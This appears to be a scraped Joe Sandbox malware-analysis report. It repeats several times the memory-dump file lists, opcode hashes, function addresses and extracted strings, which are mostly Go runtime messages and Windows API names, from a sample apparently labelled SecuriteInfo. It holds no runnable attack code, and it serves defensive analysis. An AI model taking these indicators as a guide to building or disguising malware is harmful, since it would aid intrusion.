Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction ID: 7e199d91b24763278aea2d9e01823512a43ff6753aa025c7fc013b3116b51d65
Opcode Fuzzy Hash: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction Fuzzy Hash: 40418032209F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A7706A Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 0b6f3d7c73cbb58dd17aeef2fd4b1e4cd7cd35d1ec942d0dff9f0c1c139e4dea
Instruction ID: fbe7166172e33408a26fa60a4daba7b32b4039c046e6e29b462eacde750e46e6
Opcode Fuzzy Hash: 0b6f3d7c73cbb58dd17aeef2fd4b1e4cd7cd35d1ec942d0dff9f0c1c139e4dea
Instruction Fuzzy Hash: 71418032309F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A77076 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction ID: 7e199d91b24763278aea2d9e01823512a43ff6753aa025c7fc013b3116b51d65
Opcode Fuzzy Hash: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction Fuzzy Hash: 40418032209F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A77070 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: ba714cda7ef70a39705d6b8c5236a795cc287fb535e59e92131bad40380ad16f
Instruction ID: b809b8c0460d61797dead1c3ad9145452f416a08e9be45dfcb465b756c59365f
Opcode Fuzzy Hash: ba714cda7ef70a39705d6b8c5236a795cc287fb535e59e92131bad40380ad16f
Instruction Fuzzy Hash: 25418032209F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A7707C Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction ID: 7e199d91b24763278aea2d9e01823512a43ff6753aa025c7fc013b3116b51d65
Opcode Fuzzy Hash: bb08f4f98891fd43a2eb1db8fc3c7f64e56e92bad6f460438fccf7076955207e
Instruction Fuzzy Hash: 40418032209F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A7705E Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
